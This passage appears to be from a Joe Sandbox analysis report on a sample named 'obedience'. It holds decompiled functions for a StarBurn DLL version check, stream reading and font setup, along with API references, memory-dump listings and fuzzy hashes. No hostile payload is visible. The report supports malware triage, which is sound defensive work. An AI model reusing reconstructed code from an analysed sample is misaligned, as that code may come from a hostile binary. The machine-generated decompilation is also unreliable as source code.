      • CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?,00000000), ref: 0046310B
      • CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004500D4,00000000,00000000,?), ref: 00463111
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Char$FileIconLoadLowerModuleNameNext
      • String ID: MAINICON$pH$xH$LB
      • API String ID: 3256280155-839228162
      • Opcode ID: 10fb2bccad939b0ef69921457b801be0322e4418ff689b690ef743c3924512d7
      • Instruction ID: dca05ea63cd1a85dfc27a3f2294c79b283ffa00040fb4e0873e4301a971301c9
      • Opcode Fuzzy Hash: 10fb2bccad939b0ef69921457b801be0322e4418ff689b690ef743c3924512d7
      • Instruction Fuzzy Hash: 1E516270A042449FD741DF79C8857C97BF4AB15308F0484BAE848DF357DBB99988CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00465F6C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 67windowCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • StarBurn_GetVersion.STARBURN(00000000,00466053,?,?,00000000,00000000,00000000), ref: 00465F91
      • OutputDebugStringA.KERNEL32(00000000,00000000,00466053,?,?,00000000,00000000,00000000), ref: 00465FCC
      • StarBurn_GetVersion.STARBURN(StarBurn.pas : Invalid StarBurn.dll version : 0x,00000000,00466053,?,?,00000000,00000000,00000000), ref: 00465FD8
      • OutputDebugStringA.KERNEL32(00000000,?,. Expected : 0x,?,StarBurn.pas : Invalid StarBurn.dll version : 0x,00000000,00466053,?,?,00000000,00000000,00000000), ref: 00466027
      • MessageBoxA.USER32 ref: 00466033
      Strings
      • StarBurn.pas : Invalid StarBurn.dll version : 0x, xrefs: 00465FD3
      • . Expected : 0x, xrefs: 00465FF1
      • StarBurn.pas : StarBurn.dll version : 0x, xrefs: 00465FB7
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_DebugOutputStarStringVersion$Message
      • String ID: . Expected : 0x$StarBurn.pas : Invalid StarBurn.dll version : 0x$StarBurn.pas : StarBurn.dll version : 0x
      • API String ID: 1122037688-713117416
      • Opcode ID: 3c130b23401de5555b2e6095d47403038927431b8245b91cbd70a617800f09b8
      • Instruction ID: 374ffedddccb8af46b8dfbe9ec3ecb6321eea10d350ee8c4e67df093beebe6db
      • Opcode Fuzzy Hash: 3c130b23401de5555b2e6095d47403038927431b8245b91cbd70a617800f09b8
      • Instruction Fuzzy Hash: ED119074A10200BFE714E7E6CC52B5E7669EB85708F61847BB640B66C2DA3C6D04866F
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00461DA8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 84%
      			E00461DA8(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403F68(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E004226B0(_t63, 0);
				_t28 =  *0x48f620; // 0x48e460
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x46214c;
				_t29 =  *0x48f630; // 0x48e468
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x462158;
				E00462164(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BC0(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403BC0(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403BC0(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403BC0(1);
				_t42 = E00403BC0(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00407658();
				_t75 = _t42;
				L00407348();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L004078C0();
				_t11 = _t62 + 0x58; // 0x45b12c6e
				_t45 =  *0x48f7b0; // 0x490920
				 *((intOrPtr*)( *_t45))(0, 0, E0045E57C,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E00425958(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E00425958(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E00425958(1);
				E0046268C(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x46250c;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x46250c;
				_t21 = _t62 + 0x80; // 0xc8000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x46250c;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403FC0(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























      0x00461da8
      0x00461da8
      0x00461db0
      0x00461db2
      0x00461db5
      0x00461db5
      0x00461dba
      0x00461dbd
      0x00461dc3
      0x00461dc8
      0x00461dcd
      0x00461dd0
      0x00461dd6
      0x00461ddb
      0x00461dde
      0x00461de6
      0x00461df2
      0x00461e01
      0x00461e10
      0x00461e1f
      0x00461e2e
      0x00461e38
      0x00461e3d
      0x00461e42
      0x00461e47
      0x00461e4c
      0x00461e51
      0x00461e57
      0x00461e5c
      0x00461e6a
      0x00461e71
      0x00461e7f
      0x00461e91
      0x00461ea3
      0x00461eab
      0x00461eb0
      0x00461eb0
      0x00461eb6
      0x00461eb9
      0x00461ec0
      0x00461ec0
      0x00461ec6
      0x00461ec9
      0x00461ed0
      0x00461ed0
      0x00461ed6
      0x00461ed9
      0x00461ee0
      0x00461ee6
      0x00461ee8
      0x00461eed
      0x00461ef4
      0x00461efd

      APIs
      • GetKeyboardLayout.USER32 ref: 00461DED
      • 73BEAC50.USER32(00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E42
      • 73BEAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00461E4C
      • 73BEB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004500BE,00000000,00000000,?,00000000,?), ref: 00461E57
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380KeyboardLayout
      • String ID: I$`H$hH
      • API String ID: 648844651-3079996581
      • Opcode ID: eff9e4c898e0bac2161f98e06cebf588281391319af2f9782f7a0d391a0d0318
      • Instruction ID: cbe4f1407969a8ab49285853e35b3ed884bad4dccc21d7a28376ff97dc053e32
      • Opcode Fuzzy Hash: eff9e4c898e0bac2161f98e06cebf588281391319af2f9782f7a0d391a0d0318
      • Instruction Fuzzy Hash: 35311A706142019FC350EF69DD81B497FE4BB05318F4480BAEC18DF3A2E77AA8088F69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED94360 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 489 6ed94360-6ed94396 490 6ed94398-6ed943a6 489->490 491 6ed943bf-6ed943c2 489->491 490->491 492 6ed943a8-6ed943ba 490->492 493 6ed943c8-6ed943d0 491->493 494 6ed945d3 491->494 495 6ed945d6-6ed945f1 call 6ed95b58 492->495 496 6ed943d2-6ed943e4 493->496 497 6ed943e6-6ed943e9 493->497 494->495 496->497 499 6ed94408-6ed94429 call 6ed96326 497->499 500 6ed943eb-6ed943ef call 6ed96326 497->500 507 6ed9456d-6ed94575 call 6ed937e0 499->507 508 6ed9442f 499->508 504 6ed943f4-6ed943fa 500->504 504->494 506 6ed94400-6ed94403 504->506 506->495 507->494 510 6ed94430-6ed9443b 508->510 512 6ed94441-6ed94447 510->512 513 6ed94577-6ed9457c call 6eda293d 510->513 512->513 515 6ed9444d-6ed94452 512->515 516 6ed94581-6ed94588 513->516 517 6ed9449c-6ed9449e 515->517 518 6ed94454-6ed94466 call 6ed95590 515->518 519 6ed9458a 516->519 520 6ed9458d-6ed94595 516->520 521 6ed94468-6ed9446e 517->521 522 6ed944a0-6ed944a9 517->522 518->521 536 6ed9448f-6ed94495 518->536 519->520 524 6ed945b1-6ed945bf call 6ed937e0 520->524 525 6ed94597-6ed945af call 6ed965f9 520->525 529 6ed94470 521->529 530 6ed94473-6ed94480 521->530 526 6ed944ab 522->526 527 6ed944ae-6ed944b1 522->527 524->495 525->524 526->527 534 6ed94489-6ed9448c 527->534 529->530 531 6ed94482 530->531 532 6ed94485 530->532 531->532 532->534 534->536 537 6ed944b3-6ed944b6 536->537 538 6ed94497-6ed9449a 536->538 541 6ed944b9-6ed944bc 537->541 538->541 542 6ed944be 541->542 543 6ed944c1-6ed944e8 541->543 542->543 545 6ed944ee-6ed944f1 543->545 546 6ed945c1-6ed945c5 543->546 547 6ed944f3-6ed944f6 545->547 548 6ed94532-6ed94538 545->548 546->494 549 6ed945c7-6ed945d0 call 6ed95b4d 546->549 547->546 550 6ed944fc-6ed94500 547->550 548->516 551 6ed9453a-6ed94541 548->551 549->494 554 6ed94502-6ed94509 550->554 555 6ed94556-6ed94567 call 6ed96326 550->555 556 6ed94543 551->556 557 6ed94546-6ed94551 call 6ed94c00 551->557 558 6ed9450b 554->558 559 6ed9450e-6ed9452d _memcpy_s call 6ed937e0 554->559 555->507 555->510 556->557 557->555 558->559 559->495
      C-Code - Quality: 84%
      			E6ED94360(void* __ecx) {
				signed char* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				signed char _v32;
				signed char* _v48;
				signed int _v49;
				char _v56;
				signed char** _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t87;
				signed int _t88;
				signed char _t91;
				signed char _t95;
				signed char** _t100;
				signed char _t101;
				signed char** _t103;
				signed char** _t107;
				signed char* _t110;
				signed char* _t115;
				void* _t116;
				void* _t117;
				signed int _t129;
				char _t134;
				intOrPtr _t135;
				signed char** _t136;
				intOrPtr _t137;
				signed char** _t148;
				void* _t151;
				void* _t152;
				signed char** _t154;
				void* _t156;
				signed char** _t158;
				signed char _t160;
				signed char _t162;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t169;

				_push(0xffffffff);
				_push(0x6eda5618);
				_push( *[fs:0x0]);
				_t168 = _t167 - 0x30;
				_t87 =  *0x6edaf2a0; // 0x267b4ecc
				_t88 = _t87 ^ _t166;
				_v20 = _t88;
				_push(_t116);
				_push(_t88);
				 *[fs:0x0] =  &_v16;
				_t151 = __ecx;
				_t91 =  *( *(__ecx + 0x20));
				_t147 = 0;
				if(_t91 == 0) {
					L3:
					__eflags =  *(_t151 + 0x54) - _t147;
					if( *(_t151 + 0x54) == _t147) {
						L51:
						_t92 = _t91 | 0xffffffff;
						__eflags = _t91 | 0xffffffff;
						L52:
						 *[fs:0x0] = _v16;
						_pop(_t152);
						_pop(_t156);
						_pop(_t117);
						return L6ED95B58(_t92, _t117, _v20 ^ _t166, _t147, _t152, _t156);
					}
					_t129 =  *(_t151 + 0x10);
					_t157 = _t151 + 0x48;
					__eflags =  *_t129 - _t151 + 0x48;
					if( *_t129 == _t151 + 0x48) {
						_t157 =  *((intOrPtr*)(_t151 + 0x3c));
						 *_t129 =  *((intOrPtr*)(_t151 + 0x3c));
						 *((intOrPtr*)( *((intOrPtr*)(_t151 + 0x20)))) =  *((intOrPtr*)(_t151 + 0x40));
						_t129 =  *(_t151 + 0x30);
						__eflags = 0;
						 *_t129 = 0;
					}
					__eflags =  *(_t151 + 0x44) - _t147;
					if(__eflags != 0) {
						_v28 = 0xf;
						_v32 = _t147;
						_v48 = _t147;
						_v8 = _t147;
						_t147 =  *(_t151 + 0x54);
						_push( *(_t151 + 0x54));
						_t118 = E6ED96326(_t116, _t151, _t157, __eflags);
						_t169 = _t168 + 4;
						__eflags = _t118 - 0xffffffff;
						if(_t118 == 0xffffffff) {
							L42:
							_t91 = L6ED937E0( &_v48);
							goto L51;
						}
						while(1) {
							_t95 = _v32;
							__eflags = (_t129 | 0xffffffff) - _t95 - 1;
							if((_t129 | 0xffffffff) - _t95 <= 1) {
								break;
							}
							_t162 = _t95 + 1;
							__eflags = _t162 - 0xfffffffe;
							if(_t162 > 0xfffffffe) {
								break;
							}
							_t135 = _v28;
							__eflags = _t135 - _t162;
							if(_t135 >= _t162) {
								__eflags = _t162;
								if(_t162 != 0) {
									L15:
									__eflags = _t135 - 0x10;
									_t136 = _v48;
									if(_t135 < 0x10) {
										_t136 =  &_v48;
									}
									 *((char*)(_t136 + _t95)) = _t118;
									__eflags = _v28 - 0x10;
									_t100 = _v48;
									_v32 = _t162;
									if(_v28 < 0x10) {
										_t100 =  &_v48;
									}
									 *((char*)(_t100 + _t162)) = 0;
									L20:
									_t101 = _v32;
									_t137 = _v28;
									L21:
									_t148 = _v48;
									__eflags = _t137 - 0x10;
									if(_t137 < 0x10) {
										_v60 =  &_v48;
									} else {
										_v60 = _t148;
									}
									__eflags = _t137 - 0x10;
									if(_t137 < 0x10) {
										_t148 =  &_v48;
									}
									_t129 =  *(_t151 + 0x44);
									_t164 =  *_t129;
									_t118 = _v60 + _t101;
									_t147 = _t151 + 0x4c;
									_t91 =  *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x10))))(_t151 + 0x4c, _t148, _v60 + _t101,  &_v56,  &_v49,  &_v48,  &_v64);
									__eflags = _t91;
									if(_t91 < 0) {
										L49:
										__eflags = _v28 - 0x10;
										if(_v28 >= 0x10) {
											_t147 = _v48;
											_push(_v48);
											_t91 = L6ED95B4D();
										}
										goto L51;
									} else {
										__eflags = _t91 - 1;
										if(_t91 <= 1) {
											__eflags = _v64 -  &_v49;
											if(_v64 !=  &_v49) {
												L44:
												__eflags = _v28 - 0x10;
												_t158 = _v48;
												if(_v28 < 0x10) {
													_t158 =  &_v48;
												}
												_t160 = _t158 - _v56 + _v32;
												__eflags = _t160;
												if(__eflags <= 0) {
													L48:
													L6ED937E0( &_v48);
													_t92 = _v49 & 0x000000ff;
													goto L52;
												} else {
													do {
														_t147 =  *(_t151 + 0x54);
														_t134 =  *((char*)(_t160 + _v56 - 1));
														_t160 = _t160 - 1;
														_push( *(_t151 + 0x54));
														_push(_t134);
														E6ED965F9(_t118, _t151, _t160, __eflags);
														_t169 = _t169 + 8;
														__eflags = _t160;
													} while (__eflags > 0);
													goto L48;
												}
											}
											__eflags = _v28 - 0x10;
											_t103 = _v48;
											if(_v28 < 0x10) {
												_t103 =  &_v48;
											}
											_t147 = _v56 - _t103;
											__eflags = _v56 - _t103;
											_t129 =  &_v48;
											E6ED94C00(_t129, 0, _v56 - _t103);
											L41:
											_push( *(_t151 + 0x54));
											_t118 = E6ED96326(_t118, _t151, _t164, __eflags);
											_t169 = _t169 + 4;
											__eflags = _t118 - 0xffffffff;
											if(_t118 != 0xffffffff) {
												continue;
											}
											goto L42;
										}
										__eflags = _t91 - 3;
										if(_t91 != 3) {
											goto L49;
										}
										__eflags = _v32 - 1;
										if(__eflags < 0) {
											goto L41;
										}
										__eflags = _v28 - 0x10;
										_t107 = _v48;
										if(_v28 < 0x10) {
											_t107 =  &_v48;
										}
										L6ED961E1( &_v49,  &_v49, 1, _t107, 1);
										L6ED937E0( &_v48);
										_t92 = _v49 & 0x000000ff;
										goto L52;
									}
								}
								_t110 = _v48;
								_v32 = _t162;
								__eflags = _t135 - 0x10;
								if(_t135 < 0x10) {
									_t110 =  &_v48;
								}
								 *_t110 = 0;
								goto L20;
							}
							L6ED95590( &_v48, _t147, _t162, _t95);
							_t137 = _v28;
							_t101 = _v32;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L21;
							}
							goto L15;
						}
						E6EDA293D("string too long");
						goto L44;
					} else {
						_push( *(_t151 + 0x54)); // executed
						_t91 = E6ED96326(_t116,  *(_t151 + 0x54), _t157, __eflags); // executed
						__eflags = _t91 - 0xffffffff;
						if(_t91 == 0xffffffff) {
							goto L51;
						}
						_t92 = _t91 & 0x000000ff;
						goto L52;
					}
				}
				_t91 =  *( *(__ecx + 0x20));
				if(_t91 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t91) {
					goto L3;
				}
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
				_t154 =  *(__ecx + 0x20);
				_t115 =  *_t154;
				_t147 =  &(_t115[1]);
				 *_t154 =  &(_t115[1]);
				_t92 =  *_t115 & 0x000000ff;
				goto L52;
			}














































      0x6ed94363
      0x6ed94365
      0x6ed94370
      0x6ed94371
      0x6ed94374
      0x6ed94379
      0x6ed9437b
      0x6ed9437e
      0x6ed94381
      0x6ed94385
      0x6ed9438b
      0x6ed94390
      0x6ed94392
      0x6ed94396
      0x6ed943bf
      0x6ed943bf
      0x6ed943c2
      0x6ed945d3
      0x6ed945d3
      0x6ed945d3
      0x6ed945d6
      0x6ed945d9
      0x6ed945e1
      0x6ed945e2
      0x6ed945e3
      0x6ed945f1
      0x6ed945f1
      0x6ed943c8
      0x6ed943cb
      0x6ed943ce
      0x6ed943d0
      0x6ed943d5
      0x6ed943d8
      0x6ed943dd
      0x6ed943df
      0x6ed943e2
      0x6ed943e4
      0x6ed943e4
      0x6ed943e6
      0x6ed943e9
      0x6ed94408
      0x6ed9440f
      0x6ed94412
      0x6ed94415
      0x6ed94418
      0x6ed9441b
      0x6ed94421
      0x6ed94423
      0x6ed94426
      0x6ed94429
      0x6ed9456d
      0x6ed94570
      0x00000000
      0x6ed94570
      0x6ed94430
      0x6ed94430
      0x6ed94438
      0x6ed9443b
      0x00000000
      0x00000000
      0x6ed94441
      0x6ed94444
      0x6ed94447
      0x00000000
      0x00000000
      0x6ed9444d
      0x6ed94450
      0x6ed94452
      0x6ed9449c
      0x6ed9449e
      0x6ed94468
      0x6ed94468
      0x6ed9446b
      0x6ed9446e
      0x6ed94470
      0x6ed94470
      0x6ed94473
      0x6ed94476
      0x6ed9447a
      0x6ed9447d
      0x6ed94480
      0x6ed94482
      0x6ed94482
      0x6ed94485
      0x6ed94489
      0x6ed94489
      0x6ed9448c
      0x6ed9448f
      0x6ed9448f
      0x6ed94492
      0x6ed94495
      0x6ed944b6
      0x6ed94497
      0x6ed94497
      0x6ed94497
      0x6ed944b9
      0x6ed944bc
      0x6ed944be
      0x6ed944be
      0x6ed944c1
      0x6ed944c4
      0x6ed944d9
      0x6ed944e0
      0x6ed944e4
      0x6ed944e6
      0x6ed944e8
      0x6ed945c1
      0x6ed945c1
      0x6ed945c5
      0x6ed945c7
      0x6ed945ca
      0x6ed945cb
      0x6ed945d0
      0x00000000
      0x6ed944ee
      0x6ed944ee
      0x6ed944f1
      0x6ed94535
      0x6ed94538
      0x6ed94581
      0x6ed94581
      0x6ed94585
      0x6ed94588
      0x6ed9458a
      0x6ed9458a
      0x6ed94590
      0x6ed94593
      0x6ed94595
      0x6ed945b1
      0x6ed945b8
      0x6ed945bd
      0x00000000
      0x6ed94597
      0x6ed94597
      0x6ed9459a
      0x6ed9459d
      0x6ed945a2
      0x6ed945a3
      0x6ed945a4
      0x6ed945a5
      0x6ed945aa
      0x6ed945ad
      0x6ed945ad
      0x00000000
      0x6ed94597
      0x6ed94595
      0x6ed9453a
      0x6ed9453e
      0x6ed94541
      0x6ed94543
      0x6ed94543
      0x6ed94549
      0x6ed94549
      0x6ed9454e
      0x6ed94551
      0x6ed94556
      0x6ed94559
      0x6ed9455f
      0x6ed94561
      0x6ed94564
      0x6ed94567
      0x00000000
      0x00000000
      0x00000000
      0x6ed94567
      0x6ed944f3
      0x6ed944f6
      0x00000000
      0x00000000
      0x6ed944fc
      0x6ed94500
      0x00000000
      0x00000000
      0x6ed94502
      0x6ed94506
      0x6ed94509
      0x6ed9450b
      0x6ed9450b
      0x6ed94517
      0x6ed94526
      0x6ed9452b
      0x00000000
      0x6ed9452b
      0x6ed944e8
      0x6ed944a0
      0x6ed944a3
      0x6ed944a6
      0x6ed944a9
      0x6ed944ab
      0x6ed944ab
      0x6ed944ae
      0x00000000
      0x6ed944ae
      0x6ed94459
      0x6ed9445e
      0x6ed94461
      0x6ed94464
      0x6ed94466
      0x00000000
      0x00000000
      0x00000000
      0x6ed94466
      0x6ed9457c
      0x00000000
      0x6ed943eb
      0x6ed943ee
      0x6ed943ef
      0x6ed943f7
      0x6ed943fa
      0x00000000
      0x00000000
      0x6ed94400
      0x00000000
      0x6ed94400
      0x6ed943e9
      0x6ed9439b
      0x6ed943a6
      0x00000000
      0x00000000
      0x6ed943ab
      0x6ed943ad
      0x6ed943b0
      0x6ed943b2
      0x6ed943b5
      0x6ed943b7
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: _fgetc$_memcpy_s
      • String ID: string too long
      • API String ID: 160369518-2556327735
      • Opcode ID: 290d110bad194e3f03dc24b4852473fae76235cd40c0ea55049f7738e33da58e
      • Instruction ID: 5e790ee8eba03aaa36dfced8ba6d41cd421d86d11f921c9abf444ae2714211c4
      • Opcode Fuzzy Hash: 290d110bad194e3f03dc24b4852473fae76235cd40c0ea55049f7738e33da58e
      • Instruction Fuzzy Hash: E1919A71E04619DFDB14CBE8C8C09EEB7B5FF09314F508619E821A7681E775E906DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0046268C Relevance: 10.6, APIs: 7, Instructions: 89COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 89%
      			E0046268C(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x490b7c != 0) {
					_t54 =  *0x490b7c; // 0x2481268
					_t2 = _t54 + 0x88; // 0x1
					_v5 =  *_t2;
				}
				_push(_t74);
				_push(0x4627d1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x490b7c != 0) {
					_t52 =  *0x490b7c; // 0x2481268
					E00464D04(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E00425CE8( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E00425CE8( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0xc8000000
					E00425DCC( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E00425CE8( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xc8000000
					E00425CE8( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E00425CE8( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xc8000000
				E00425B2C( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00425B2C( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4627d8);
				if( *0x490b7c != 0) {
					_t38 =  *0x490b7c; // 0x2481268
					return E00464D04(_t38, _v5);
				}
				return 0;
			}






















      0x0046268c
      0x0046268d
      0x0046268f
      0x00462696
      0x00462698
      0x004626a3
      0x004626a5
      0x004626aa
      0x004626b0
      0x004626b0
      0x004626b5
      0x004626b6
      0x004626bb
      0x004626be
      0x004626c8
      0x004626cc
      0x004626d1
      0x004626d1
      0x004626e7
      0x00462703
      0x0046270a
      0x00462710
      0x004626e9
      0x004626ed
      0x004626f4
      0x004626fa
      0x004626fa
      0x00462715
      0x0046272c
      0x00462733
      0x00462769
      0x00462774
      0x0046277b
      0x00462782
      0x00462788
      0x00462735
      0x0046273c
      0x00462743
      0x00462749
      0x00462755
      0x0046275c
      0x00462762
      0x00462762
      0x0046278d
      0x00462798
      0x0046279d
      0x004627a8
      0x004627b2
      0x004627b5
      0x004627c1
      0x004627c6
      0x00000000
      0x004627cb
      0x004627d0

      APIs
